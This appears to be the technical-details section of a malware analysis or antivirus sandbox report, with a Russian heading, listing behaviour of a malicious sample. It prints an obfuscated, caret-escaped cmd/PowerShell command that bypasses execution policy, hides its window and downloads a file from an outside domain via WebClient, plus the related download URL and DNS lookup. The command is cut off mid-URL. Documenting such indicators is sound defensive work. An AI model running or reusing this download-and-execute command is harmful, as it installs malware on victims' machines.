Техническая информация
- http://transporingsytw.wang/search.php как %appdata%.exe
- '<SYSTEM32>\cmd.exe' /C "PoWEr^SHelL.E^x^e^ ^-eXEcUT^IoNP^olic^Y byPaS^S^ -no^p^R^oF^il^e^ -WINdOWST^Yle ^HIdDeN (NEW-O^bje^CT sy^sT^eM^.neT.WEB^clienT^)^.dO^WnlOA^dfI^l^E^(^'http://transporin...
- DNS ASK tr#####ringsytw.wang
- '<SYSTEM32>\cmd.exe' /C "PoWEr^SHelL.E^x^e^ ^-eXEcUT^IoNP^olic^Y byPaS^S^ -no^p^R^oF^il^e^ -WINdOWST^Yle ^HIdDeN (NEW-O^bje^CT sy^sT^eM^.neT.WEB^clienT^)^.dO^WnlOA^dfI^l^E^(^'http://transporin...' (со скрытым окном)